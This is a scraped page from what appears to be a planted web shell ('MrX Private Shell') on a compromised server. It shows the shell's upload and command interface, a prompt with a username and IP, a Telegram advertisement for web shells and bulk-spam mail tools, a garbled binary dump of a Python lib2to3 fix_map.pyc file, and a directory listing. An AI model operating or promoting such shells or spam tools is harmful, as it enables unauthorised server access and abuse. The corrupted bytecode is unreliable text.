__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

aptanhua@216.73.216.200: ~ $
�

<��i8��~�dZddlmZddlmZddlmZmZmZm	Z	m
Z
ddlmZ
ddlmZGd�dej �Zy	)
aFixer that changes map(F, ...) into list(map(F, ...)) unless there
exists a 'from future_builtins import map' statement in the top-level
namespace.

As a special case, map(None, X) is changed into list(X).  (This is
necessary because the semantics are changed in this case -- the new
map(None, X) is equivalent to [(x,) for x in X].)

We avoid the transformation (except for the special case mentioned
above) if the map() call is directly contained in iter(<>), list(<>),
tuple(<>), sorted(<>), ...join(<>), or for V in <>:.

NOTE: This is still not correct if the original code was depending on
map(F, X, Y, ...) to go on until the longest argument is exhausted,
substituting None for missing values -- like zip(), it now stops as
soon as the shortest argument is exhausted.
�)�token)�
fixer_base)�Name�ArgList�Call�ListComp�in_special_context)�python_symbols)�Nodec��eZdZdZdZdZd�Zy)�FixMapTaL
    map_none=power<
        'map'
        trailer< '(' arglist< 'None' ',' arg=any [','] > ')' >
        [extra_trailers=trailer*]
    >
    |
    map_lambda=power<
        'map'
        trailer<
            '('
            arglist<
                lambdef< 'lambda'
                         (fp=NAME | vfpdef< '(' fp=NAME ')'> ) ':' xp=any
                >
                ','
                it=any
            >
            ')'
        >
        [extra_trailers=trailer*]
    >
    |
    power<
        'map' args=trailer< '(' [any] ')' >
        [extra_trailers=trailer*]
    >
    zfuture_builtins.mapc�
�|j|�ryg}d|vr)|dD]!}|j|j���#|jjt
jk(rA|j|d�|j�}d|_ttd�|g�}�n�d|vrbt|dj�|dj�|dj��}tt
j|g|zd�	�}�nbd
|vr|dj�}d|_�n	d|vr�|d}|jt
jk(r�|jd
jt
j k(rs|jd
jdjt"j$k(r<|jd
jdj&dk(r|j|d�ytt
jtd�|j�g�}d|_t)|�rytt
jtd�t+g�g|z�}d|_|j|_|S)N�extra_trailerszYou should use a for loop here��list�
map_lambda�xp�fp�it)�prefix�map_none�arg�args���Nonezjcannot convert map(None, ...) with multiple arguments because map() now truncates to the shortest sequence�map)�should_skip�append�clone�parent�type�syms�simple_stmt�warningrrrrr�power�trailer�children�arglistr�NAME�valuer	r)�self�node�results�trailers�t�newrs       �</opt/alt/python312/lib64/python3.12/lib2to3/fixes/fix_map.py�	transformzFixMap.transform@s�����D�!�����w�&��-�.��������	�*�/��;�;���t�/�/�/��L�L��?�@��*�*�,�C��C�J��t�F�|�c�U�+�C�
�W�
$��7�4�=�.�.�0�"�4�=�.�.�0�"�4�=�.�.�0�2�C��t�z�z�C�5�8�#3�B�?�C��W�$��e�n�*�*�,����
��W�$�"�6�?�D��y�y�D�L�L�0��}�}�Q�'�,�,����<��}�}�Q�'�0�0��3�8�8�E�J�J�F��}�}�Q�'�0�0��3�9�9�V�C����T�,N�O���t�z�z�D��K�����+F�G�C�!#�C�J�%�d�+���t�z�z�D��L�'�3�%�.�#A�H�#L�M�C��C�J��[�[��
��
�N)�__name__�
__module__�__qualname__�
BM_compatible�PATTERN�skip_onr3�r4r2r
r
s���M��G�:$�G�.r4r
N)�__doc__�pgen2rrr�
fixer_utilrrrrr	�pygramr
r#�pytreer�ConditionalFixr
r;r4r2�<module>rBs2���&��J�J�+��P�Z�
&�
&�Pr4

Filemanager

Name Type Size Permission Actions
__init__.cpython-312.opt-1.pyc File 158 B 0644
__init__.cpython-312.opt-2.pyc File 158 B 0644
__init__.cpython-312.pyc File 158 B 0644
fix_apply.cpython-312.opt-1.pyc File 2.71 KB 0644
fix_apply.cpython-312.opt-2.pyc File 2.62 KB 0644
fix_apply.cpython-312.pyc File 2.72 KB 0644
fix_asserts.cpython-312.opt-1.pyc File 1.5 KB 0644
fix_asserts.cpython-312.opt-2.pyc File 1.44 KB 0644
fix_asserts.cpython-312.pyc File 1.5 KB 0644
fix_basestring.cpython-312.opt-1.pyc File 786 B 0644
fix_basestring.cpython-312.opt-2.pyc File 745 B 0644
fix_basestring.cpython-312.pyc File 786 B 0644
fix_buffer.cpython-312.opt-1.pyc File 976 B 0644
fix_buffer.cpython-312.opt-2.pyc File 911 B 0644
fix_buffer.cpython-312.pyc File 976 B 0644
fix_dict.cpython-312.opt-1.pyc File 4.4 KB 0644
fix_dict.cpython-312.opt-2.pyc File 3.53 KB 0644
fix_dict.cpython-312.pyc File 4.49 KB 0644
fix_except.cpython-312.opt-1.pyc File 3.94 KB 0644
fix_except.cpython-312.opt-2.pyc File 3.51 KB 0644
fix_except.cpython-312.pyc File 3.94 KB 0644
fix_exec.cpython-312.opt-1.pyc File 1.57 KB 0644
fix_exec.cpython-312.opt-2.pyc File 1.41 KB 0644
fix_exec.cpython-312.pyc File 1.58 KB 0644
fix_execfile.cpython-312.opt-1.pyc File 2.67 KB 0644
fix_execfile.cpython-312.opt-2.pyc File 2.55 KB 0644
fix_execfile.cpython-312.pyc File 2.69 KB 0644
fix_exitfunc.cpython-312.opt-1.pyc File 3.5 KB 0644
fix_exitfunc.cpython-312.opt-2.pyc File 3.43 KB 0644
fix_exitfunc.cpython-312.pyc File 3.5 KB 0644
fix_filter.cpython-312.opt-1.pyc File 3.53 KB 0644
fix_filter.cpython-312.opt-2.pyc File 3.09 KB 0644
fix_filter.cpython-312.pyc File 3.53 KB 0644
fix_funcattrs.cpython-312.opt-1.pyc File 1.15 KB 0644
fix_funcattrs.cpython-312.opt-2.pyc File 1.09 KB 0644
fix_funcattrs.cpython-312.pyc File 1.15 KB 0644
fix_future.cpython-312.opt-1.pyc File 925 B 0644
fix_future.cpython-312.opt-2.pyc File 826 B 0644
fix_future.cpython-312.pyc File 925 B 0644
fix_getcwdu.cpython-312.opt-1.pyc File 953 B 0644
fix_getcwdu.cpython-312.opt-2.pyc File 891 B 0644
fix_getcwdu.cpython-312.pyc File 953 B 0644
fix_has_key.cpython-312.opt-1.pyc File 4.12 KB 0644
fix_has_key.cpython-312.opt-2.pyc File 3.57 KB 0644
fix_has_key.cpython-312.pyc File 4.13 KB 0644
fix_idioms.cpython-312.opt-1.pyc File 5.2 KB 0644
fix_idioms.cpython-312.opt-2.pyc File 4.72 KB 0644
fix_idioms.cpython-312.pyc File 5.35 KB 0644
fix_import.cpython-312.opt-1.pyc File 4.17 KB 0644
fix_import.cpython-312.opt-2.pyc File 3.87 KB 0644
fix_import.cpython-312.pyc File 4.17 KB 0644
fix_imports.cpython-312.opt-1.pyc File 5.98 KB 0644
fix_imports.cpython-312.opt-2.pyc File 5.92 KB 0644
fix_imports.cpython-312.pyc File 5.98 KB 0644
fix_imports2.cpython-312.opt-1.pyc File 626 B 0644
fix_imports2.cpython-312.opt-2.pyc File 529 B 0644
fix_imports2.cpython-312.pyc File 626 B 0644
fix_input.cpython-312.opt-1.pyc File 1.25 KB 0644
fix_input.cpython-312.opt-2.pyc File 1.18 KB 0644
fix_input.cpython-312.pyc File 1.25 KB 0644
fix_intern.cpython-312.opt-1.pyc File 1.39 KB 0644
fix_intern.cpython-312.opt-2.pyc File 1.33 KB 0644
fix_intern.cpython-312.pyc File 1.39 KB 0644
fix_isinstance.cpython-312.opt-1.pyc File 2.3 KB 0644
fix_isinstance.cpython-312.opt-2.pyc File 1.99 KB 0644
fix_isinstance.cpython-312.pyc File 2.3 KB 0644
fix_itertools.cpython-312.opt-1.pyc File 1.94 KB 0644
fix_itertools.cpython-312.opt-2.pyc File 1.59 KB 0644
fix_itertools.cpython-312.pyc File 1.94 KB 0644
fix_itertools_imports.cpython-312.opt-1.pyc File 2.58 KB 0644
fix_itertools_imports.cpython-312.opt-2.pyc File 2.5 KB 0644
fix_itertools_imports.cpython-312.pyc File 2.66 KB 0644
fix_long.cpython-312.opt-1.pyc File 852 B 0644
fix_long.cpython-312.opt-2.pyc File 792 B 0644
fix_long.cpython-312.pyc File 852 B 0644
fix_map.cpython-312.opt-1.pyc File 4.41 KB 0644
fix_map.cpython-312.opt-2.pyc File 3.64 KB 0644
fix_map.cpython-312.pyc File 4.41 KB 0644
fix_metaclass.cpython-312.opt-1.pyc File 10.11 KB 0644
fix_metaclass.cpython-312.opt-2.pyc File 8.8 KB 0644
fix_metaclass.cpython-312.pyc File 10.2 KB 0644
fix_methodattrs.cpython-312.opt-1.pyc File 1.13 KB 0644
fix_methodattrs.cpython-312.opt-2.pyc File 1.06 KB 0644
fix_methodattrs.cpython-312.pyc File 1.13 KB 0644
fix_ne.cpython-312.opt-1.pyc File 1.03 KB 0644
fix_ne.cpython-312.opt-2.pyc File 1010 B 0644
fix_ne.cpython-312.pyc File 1.03 KB 0644
fix_next.cpython-312.opt-1.pyc File 4.26 KB 0644
fix_next.cpython-312.opt-2.pyc File 4.21 KB 0644
fix_next.cpython-312.pyc File 4.28 KB 0644
fix_nonzero.cpython-312.opt-1.pyc File 1.06 KB 0644
fix_nonzero.cpython-312.opt-2.pyc File 1.01 KB 0644
fix_nonzero.cpython-312.pyc File 1.06 KB 0644
fix_numliterals.cpython-312.opt-1.pyc File 1.41 KB 0644
fix_numliterals.cpython-312.opt-2.pyc File 1.35 KB 0644
fix_numliterals.cpython-312.pyc File 1.41 KB 0644
fix_operator.cpython-312.opt-1.pyc File 5.5 KB 0644
fix_operator.cpython-312.opt-2.pyc File 5.03 KB 0644
fix_operator.cpython-312.pyc File 5.5 KB 0644
fix_paren.cpython-312.opt-1.pyc File 1.6 KB 0644
fix_paren.cpython-312.opt-2.pyc File 1.47 KB 0644
fix_paren.cpython-312.pyc File 1.6 KB 0644
fix_print.cpython-312.opt-1.pyc File 3.29 KB 0644
fix_print.cpython-312.opt-2.pyc File 3.01 KB 0644
fix_print.cpython-312.pyc File 3.43 KB 0644
fix_raise.cpython-312.opt-1.pyc File 3.32 KB 0644
fix_raise.cpython-312.opt-2.pyc File 2.71 KB 0644
fix_raise.cpython-312.pyc File 3.32 KB 0644
fix_raw_input.cpython-312.opt-1.pyc File 958 B 0644
fix_raw_input.cpython-312.opt-2.pyc File 895 B 0644
fix_raw_input.cpython-312.pyc File 958 B 0644
fix_reduce.cpython-312.opt-1.pyc File 1.2 KB 0644
fix_reduce.cpython-312.opt-2.pyc File 1.08 KB 0644
fix_reduce.cpython-312.pyc File 1.2 KB 0644
fix_reload.cpython-312.opt-1.pyc File 1.4 KB 0644
fix_reload.cpython-312.opt-2.pyc File 1.33 KB 0644
fix_reload.cpython-312.pyc File 1.4 KB 0644
fix_renames.cpython-312.opt-1.pyc File 2.81 KB 0644
fix_renames.cpython-312.opt-2.pyc File 2.73 KB 0644
fix_renames.cpython-312.pyc File 2.81 KB 0644
fix_repr.cpython-312.opt-1.pyc File 1.11 KB 0644
fix_repr.cpython-312.opt-2.pyc File 1.05 KB 0644
fix_repr.cpython-312.pyc File 1.11 KB 0644
fix_set_literal.cpython-312.opt-1.pyc File 2.58 KB 0644
fix_set_literal.cpython-312.opt-2.pyc File 2.51 KB 0644
fix_set_literal.cpython-312.pyc File 2.58 KB 0644
fix_standarderror.cpython-312.opt-1.pyc File 847 B 0644
fix_standarderror.cpython-312.opt-2.pyc File 797 B 0644
fix_standarderror.cpython-312.pyc File 847 B 0644
fix_sys_exc.cpython-312.opt-1.pyc File 1.98 KB 0644
fix_sys_exc.cpython-312.opt-2.pyc File 1.82 KB 0644
fix_sys_exc.cpython-312.pyc File 1.98 KB 0644
fix_throw.cpython-312.opt-1.pyc File 2.4 KB 0644
fix_throw.cpython-312.opt-2.pyc File 2.18 KB 0644
fix_throw.cpython-312.pyc File 2.4 KB 0644
fix_tuple_params.cpython-312.opt-1.pyc File 7.66 KB 0644
fix_tuple_params.cpython-312.opt-2.pyc File 7.34 KB 0644
fix_tuple_params.cpython-312.pyc File 7.66 KB 0644
fix_types.cpython-312.opt-1.pyc File 2.24 KB 0644
fix_types.cpython-312.opt-2.pyc File 1.78 KB 0644
fix_types.cpython-312.pyc File 2.24 KB 0644
fix_unicode.cpython-312.opt-1.pyc File 2.13 KB 0644
fix_unicode.cpython-312.opt-2.pyc File 1.96 KB 0644
fix_unicode.cpython-312.pyc File 2.13 KB 0644
fix_urllib.cpython-312.opt-1.pyc File 8.95 KB 0644
fix_urllib.cpython-312.opt-2.pyc File 8.42 KB 0644
fix_urllib.cpython-312.pyc File 8.95 KB 0644
fix_ws_comma.cpython-312.opt-1.pyc File 1.53 KB 0644
fix_ws_comma.cpython-312.opt-2.pyc File 1.35 KB 0644
fix_ws_comma.cpython-312.pyc File 1.53 KB 0644
fix_xrange.cpython-312.opt-1.pyc File 3.74 KB 0644
fix_xrange.cpython-312.opt-2.pyc File 3.68 KB 0644
fix_xrange.cpython-312.pyc File 3.74 KB 0644
fix_xreadlines.cpython-312.opt-1.pyc File 1.27 KB 0644
fix_xreadlines.cpython-312.opt-2.pyc File 1.14 KB 0644
fix_xreadlines.cpython-312.pyc File 1.27 KB 0644
fix_zip.cpython-312.opt-1.pyc File 1.94 KB 0644
fix_zip.cpython-312.opt-2.pyc File 1.63 KB 0644
fix_zip.cpython-312.pyc File 1.94 KB 0644